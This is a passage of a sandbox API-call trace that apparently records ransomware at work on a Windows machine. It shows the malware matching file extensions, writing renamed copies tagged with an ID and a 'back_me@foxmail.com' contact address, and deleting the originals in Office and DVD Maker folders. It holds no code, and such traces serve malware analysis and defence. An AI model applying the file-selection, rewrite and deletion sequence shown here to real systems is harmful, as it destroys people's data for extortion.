lstrlenW (lpString=".7z") returned 3 [0243.039] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0243.039] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png") returned 73 [0243.039] lstrlenW (lpString=".dbf") returned 4 [0243.039] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0243.411] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\ParentMenuButtonIconSubpict.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\parentmenubuttoniconsubpict.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0258.649] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=32184) returned 1 [0258.649] CloseHandle (hObject=0x318) returned 1 [0258.649] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101858.bmp")) returned 0x20 [0258.649] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101858.bmp.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0258.650] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101858.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0258.650] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0258.650] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0258.650] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101858.bmp.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0258.650] GetLastError () returned 0x0 [0258.650] ReadFile (in: hFile=0x318, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x7db8, lpOverlapped=0x0) returned 1 [0258.654] WriteFile (in: hFile=0x384, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x7dc0, lpOverlapped=0x0) returned 1 [0258.655] ReadFile (in: hFile=0x318, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0258.655] WriteFile (in: hFile=0x384, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0258.655] SetEndOfFile (hFile=0x384) returned 1 [0258.655] CloseHandle (hObject=0x384) returned 1 [0258.655] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0258.655] SetEndOfFile (hFile=0x318) returned 1 [0258.658] CloseHandle (hObject=0x318) returned 1 [0258.658] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0258.658] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101858.bmp")) returned 1 [0258.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP") returned 63 [0258.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP") returned 63 [0258.658] lstrlenW (lpString=".doc") returned 4 [0258.658] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1 [0258.658] lstrlenW (lpString=".docx") returned 5 [0258.658] lstrcmpiW (lpString1=".docx", lpString2="8.BMP") returned -1 [0258.658] lstrlenW (lpString=".pdf") returned 4 [0258.658] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1 [0258.658] lstrlenW (lpString=".xls") returned 4 [0258.658] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1 [0258.658] lstrlenW (lpString=".xlsx") returned 5 [0258.658] lstrcmpiW (lpString1=".xlsx", lpString2="8.BMP") returned -1 [0258.658] lstrlenW (lpString=".ppt") returned 4 [0258.658] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1 [0258.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP") returned 63 [0258.659] lstrlenW (lpString=".zip") returned 4 [0258.659] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0258.659] lstrlenW (lpString=".rar") returned 4 [0258.659] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0258.659] lstrlenW (lpString=".bz2") returned 4 [0258.659] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1 [0258.659] lstrlenW (lpString=".7z") returned 3 [0258.659] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1 [0258.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP") returned 63 [0258.659] lstrlenW (lpString=".dbf") returned 4 [0258.659] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0258.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP") returned 63 [0258.659] lstrlenW (lpString=".1cd") returned 4 [0258.659] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1 [0258.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP") returned 63 [0258.659] lstrlenW (lpString=".jpg") returned 4 [0258.659] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1 [0258.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP") returned 63 [0258.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP") returned 63 [0258.659] lstrlenW (lpString=".doc") returned 4 [0258.659] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1 [0258.659] lstrlenW (lpString=".docx") returned 5 [0258.659] lstrcmpiW (lpString1=".docx", lpString2="8.BMP") returned -1 [0258.659] lstrlenW (lpString=".pdf") returned 4 [0258.659] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1 [0258.659] lstrlenW (lpString=".xls") returned 4 [0258.659] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1 [0258.659] lstrlenW (lpString=".xlsx") returned 5 [0258.659] lstrcmpiW (lpString1=".xlsx", lpString2="8.BMP") returned -1 [0258.659] lstrlenW (lpString=".ppt") returned 4 [0258.660] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1 [0258.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP") returned 63 [0258.660] lstrlenW (lpString=".zip") returned 4 [0258.660] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0258.660] lstrlenW (lpString=".rar") returned 4 [0258.660] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0258.660] lstrlenW (lpString=".bz2") returned 4 [0258.660] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1 [0258.660] lstrlenW (lpString=".7z") returned 3 [0258.660] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1 [0258.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP") returned 63 [0258.660] lstrlenW (lpString=".dbf") returned 4 [0258.660] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0258.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP") returned 63 [0258.660] lstrlenW (lpString=".1cd") returned 4 [0258.660] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1 [0258.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101858.BMP") returned 63 [0258.660] lstrlenW (lpString=".jpg") returned 4 [0258.660] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1 [0258.660] lstrcmpiW (lpString1=".BMP", lpString2=".php") returned -1 [0258.660] lstrlenW (lpString="J0101859.BMP") returned 12 [0258.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101859.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0258.661] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=31968) returned 1 [0258.661] CloseHandle (hObject=0x318) returned 1 [0258.661] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101859.bmp")) returned 0x20 [0258.661] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101859.bmp.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0258.661] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101859.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0258.661] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0258.661] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0258.661] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101859.bmp.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0258.661] GetLastError () returned 0x0 [0258.661] ReadFile (in: hFile=0x318, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x7ce0, lpOverlapped=0x0) returned 1 [0259.109] WriteFile (in: hFile=0x384, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x7cf0, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x7cf0, lpOverlapped=0x0) returned 1 [0259.111] ReadFile (in: hFile=0x318, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0259.111] WriteFile (in: hFile=0x384, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0259.111] SetEndOfFile (hFile=0x384) returned 1 [0259.111] CloseHandle (hObject=0x384) returned 1 [0259.111] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0259.111] SetEndOfFile (hFile=0x318) returned 1 [0259.113] CloseHandle (hObject=0x318) returned 1 [0259.113] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0259.142] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101859.bmp")) returned 1 [0259.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP") returned 63 [0259.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP") returned 63 [0259.181] lstrlenW (lpString=".doc") returned 4 [0259.181] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1 [0259.181] lstrlenW (lpString=".docx") returned 5 [0259.181] lstrcmpiW (lpString1=".docx", lpString2="9.BMP") returned -1 [0259.181] lstrlenW (lpString=".pdf") returned 4 [0259.181] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1 [0259.181] lstrlenW (lpString=".xls") returned 4 [0259.181] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1 [0259.181] lstrlenW (lpString=".xlsx") returned 5 [0259.181] lstrcmpiW (lpString1=".xlsx", lpString2="9.BMP") returned -1 [0259.181] lstrlenW (lpString=".ppt") returned 4 [0259.181] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1 [0259.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP") returned 63 [0259.181] lstrlenW (lpString=".zip") returned 4 [0259.181] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0259.181] lstrlenW (lpString=".rar") returned 4 [0259.181] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0259.181] lstrlenW (lpString=".bz2") returned 4 [0259.181] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1 [0259.181] lstrlenW (lpString=".7z") returned 3 [0259.181] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1 [0259.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP") returned 63 [0259.181] lstrlenW (lpString=".dbf") returned 4 [0259.182] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0259.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP") returned 63 [0259.182] lstrlenW (lpString=".1cd") returned 4 [0259.182] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1 [0259.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP") returned 63 [0259.182] lstrlenW (lpString=".jpg") returned 4 [0259.182] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1 [0259.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP") returned 63 [0259.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP") returned 63 [0259.182] lstrlenW (lpString=".doc") returned 4 [0259.182] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1 [0259.182] lstrlenW (lpString=".docx") returned 5 [0259.182] lstrcmpiW (lpString1=".docx", lpString2="9.BMP") returned -1 [0259.182] lstrlenW (lpString=".pdf") returned 4 [0259.182] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1 [0259.182] lstrlenW (lpString=".xls") returned 4 [0259.182] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1 [0259.182] lstrlenW (lpString=".xlsx") returned 5 [0259.182] lstrcmpiW (lpString1=".xlsx", lpString2="9.BMP") returned -1 [0259.182] lstrlenW (lpString=".ppt") returned 4 [0259.182] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1 [0259.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP") returned 63 [0259.182] lstrlenW (lpString=".zip") returned 4 [0259.182] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0259.182] lstrlenW (lpString=".rar") returned 4 [0259.182] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0259.182] lstrlenW (lpString=".bz2") returned 4 [0259.182] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1 [0259.182] lstrlenW (lpString=".7z") returned 3 [0259.182] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1 [0259.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP") returned 63 [0259.182] lstrlenW (lpString=".dbf") returned 4 [0259.183] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0259.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP") returned 63 [0259.183] lstrlenW (lpString=".1cd") returned 4 [0259.183] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1 [0259.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101859.BMP") returned 63 [0259.183] lstrlenW (lpString=".jpg") returned 4 [0259.183] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1 [0259.183] lstrcmpiW (lpString1=".BMP", lpString2=".php") returned -1 [0259.183] lstrlenW (lpString="J0101863.BMP") returned 12 [0259.183] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101863.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0259.183] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=32184) returned 1 [0259.183] CloseHandle (hObject=0x200) returned 1 [0259.183] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101863.bmp")) returned 0x20 [0259.183] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101863.bmp.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0259.184] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101863.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0259.184] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0259.184] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0259.184] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101863.bmp.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0259.184] GetLastError () returned 0x0 [0259.184] ReadFile (in: hFile=0x200, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x7db8, lpOverlapped=0x0) returned 1 [0259.201] WriteFile (in: hFile=0x380, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x7dc0, lpOverlapped=0x0) returned 1 [0259.202] ReadFile (in: hFile=0x200, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0259.202] WriteFile (in: hFile=0x380, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0259.202] SetEndOfFile (hFile=0x380) returned 1 [0259.202] CloseHandle (hObject=0x380) returned 1 [0259.203] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0259.203] SetEndOfFile (hFile=0x200) returned 1 [0259.205] CloseHandle (hObject=0x200) returned 1 [0259.205] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0259.219] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101863.bmp")) returned 1 [0259.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP") returned 63 [0259.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP") returned 63 [0259.220] lstrlenW (lpString=".doc") returned 4 [0259.220] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1 [0259.220] lstrlenW (lpString=".docx") returned 5 [0259.220] lstrcmpiW (lpString1=".docx", lpString2="3.BMP") returned -1 [0259.220] lstrlenW (lpString=".pdf") returned 4 [0259.220] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1 [0259.220] lstrlenW (lpString=".xls") returned 4 [0259.220] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1 [0259.220] lstrlenW (lpString=".xlsx") returned 5 [0259.220] lstrcmpiW (lpString1=".xlsx", lpString2="3.BMP") returned -1 [0259.220] lstrlenW (lpString=".ppt") returned 4 [0259.220] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1 [0259.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP") returned 63 [0259.220] lstrlenW (lpString=".zip") returned 4 [0259.220] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0259.220] lstrlenW (lpString=".rar") returned 4 [0259.220] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0259.220] lstrlenW (lpString=".bz2") returned 4 [0259.220] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1 [0259.220] lstrlenW (lpString=".7z") returned 3 [0259.220] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1 [0259.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP") returned 63 [0259.220] lstrlenW (lpString=".dbf") returned 4 [0259.220] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0259.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP") returned 63 [0259.220] lstrlenW (lpString=".1cd") returned 4 [0259.220] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1 [0259.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP") returned 63 [0259.220] lstrlenW (lpString=".jpg") returned 4 [0259.220] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1 [0259.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP") returned 63 [0259.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP") returned 63 [0259.221] lstrlenW (lpString=".doc") returned 4 [0259.221] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1 [0259.221] lstrlenW (lpString=".docx") returned 5 [0259.221] lstrcmpiW (lpString1=".docx", lpString2="3.BMP") returned -1 [0259.221] lstrlenW (lpString=".pdf") returned 4 [0259.221] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1 [0259.221] lstrlenW (lpString=".xls") returned 4 [0259.221] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1 [0259.221] lstrlenW (lpString=".xlsx") returned 5 [0259.221] lstrcmpiW (lpString1=".xlsx", lpString2="3.BMP") returned -1 [0259.221] lstrlenW (lpString=".ppt") returned 4 [0259.221] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1 [0259.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP") returned 63 [0259.221] lstrlenW (lpString=".zip") returned 4 [0259.221] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0259.221] lstrlenW (lpString=".rar") returned 4 [0259.221] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0259.221] lstrlenW (lpString=".bz2") returned 4 [0259.221] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1 [0259.221] lstrlenW (lpString=".7z") returned 3 [0259.221] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1 [0259.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP") returned 63 [0259.221] lstrlenW (lpString=".dbf") returned 4 [0259.221] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0259.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP") returned 63 [0259.221] lstrlenW (lpString=".1cd") returned 4 [0259.221] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1 [0259.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP") returned 63 [0259.221] lstrlenW (lpString=".jpg") returned 4 [0259.221] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1 [0259.222] lstrcmpiW (lpString1=".BMP", lpString2=".php") returned -1 [0259.222] lstrlenW (lpString="J0101867.BMP") returned 12 [0259.222] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101867.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0259.225] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=32616) returned 1 [0259.225] CloseHandle (hObject=0x384) returned 1 [0259.225] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101867.bmp")) returned 0x20 [0259.265] 